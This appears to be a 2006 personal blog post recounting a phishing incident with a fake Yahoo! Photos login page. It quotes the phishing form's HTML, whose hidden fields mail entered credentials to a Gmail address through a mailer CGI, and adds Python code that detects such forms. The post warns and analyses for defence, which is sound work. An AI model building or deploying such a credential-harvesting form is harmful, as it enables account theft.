Thursday, August 17, 2006

Thieves Stealing Yahoo! Accounts

This is a warning and a story at the same time...


The story... Yesterday I received a link via Yahoo! Messenger from a friend. So I clicked it. It was supposed to be a funny picture, and since I love to see funny things I went along. The site that opened looked exactly like the Yahoo! Photos log-in page. A little bit strange, but it was hosted on Geocities, which is part of Yahoo!. So I typed in the user name and password... Next I saw the log-in page again with my user name read-only; this time the page was the legitimate Yahoo! Photos log-in page. That moment was just like a lightning bolt striking me... So I went back to that page and viewed the source. Surprise! The page was mailing those credentials to a GMail account! Imagine my frustration at that moment, as I should have seen that before I entered the password! So the next move was to change the password for the account. Luckily it worked and I managed to keep the account. So the next move was to send a warning to Google, Yahoo! and F-Secure (see below why), and I sent a note in Romanian and English to all my Yahoo! contacts.


The warning... Please, pretty please... be very careful where you type in the credentials to your accounts, banks etc., and make sure that you are actually on the right sites. Never, ever follow links in e-mails that ask for bank credentials, and be suspicious of the ones that want your site credentials.


The analysis of the page... Now I get technical. I used view source and looked at the <form> tag; here is its content:


<FORM METHOD="POST" ACTION="http://<a site address goes here>/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="<a mail account>@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos">

Look at it! The action for the page is a mailer CGI... that means that it actually mails the password to someone! Next you can see that it mails it to a GMail account with the subject "Yahoo id", and the mailer then redirects you to Yahoo! Photos.


Looking at the hidden fields you can see that the mailer is a publicly accessible one and not a custom-made one. And since I could see which GMail account was used to receive the credentials, I notified Google. The page is hosted on Yahoo! Geocities, so I notified Yahoo! too. And since I am a "fan" of F-Secure products, I also dropped them a note.
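The same "view source" check can be automated. Below is an added example (my own code, not from the original post) that parses a page's forms and flags the three tell-tale signs of this mailer-CGI phish: a password field posted to a host other than the page's own, a Mail_To hidden field or mailto.cgi action, and a Next_Page hidden field that sends the victim on to a different site. The sample page and the hostnames mailer.example.invalid and someone@example.com are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample with the same shape as the phishing form in the post;
# the mailer host and mailbox are placeholders, not the real ones.
SAMPLE_PAGE = """
<form method="POST" action="http://mailer.example.invalid/form/mailto.cgi">
<input type="hidden" name="Mail_From" value="Yahoo">
<input type="hidden" name="Mail_To" value="someone@example.com">
<input type="hidden" name="Mail_Subject" value="Yahoo id">
<input type="hidden" name="Next_Page" value="http://photos.yahoo.com/ph//my_photos">
<input type="text" name="login"><input type="password" name="passwd">
</form>
"""

class FormCollector(HTMLParser):
    """Collect every <form> together with its action and <input> attributes."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def analyze_forms(html, page_host):
    """Return, per form, the list of reasons it looks like a credential-mailing phish."""
    p = FormCollector()
    p.feed(html)
    findings = []
    for f in p.forms:
        reasons = []
        names = {i.get("name", "").lower() for i in f["inputs"]}
        types = {i.get("type", "text").lower() for i in f["inputs"]}
        hidden = {i.get("name", "").lower(): i.get("value", "")
                  for i in f["inputs"] if i.get("type", "").lower() == "hidden"}
        action_host = urlparse(f["action"]).hostname or page_host
        if "password" in types and action_host != page_host:
            reasons.append(f"password posted off-site to {action_host}")
        if "mail_to" in names or f["action"].lower().endswith("mailto.cgi"):
            reasons.append("form submits to a mail-forwarding CGI")
        next_host = urlparse(hidden.get("next_page", "")).hostname
        if next_host and next_host != page_host:
            reasons.append(f"after submit the user is sent on to {next_host}")
        findings.append(reasons)
    return findings
```

Running analyze_forms(SAMPLE_PAGE, "www.geocities.com") reports all three findings for the sample form, while an ordinary same-site login form produces an empty list.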


So I really hope that the site on Geocities will be shut down, as well as the mail account on Google. Hopefully the owners of the abused accounts will pursue criminal investigations and the thief will be caught and brought to justice... Am I too harsh with her/him? You judge and tell me...
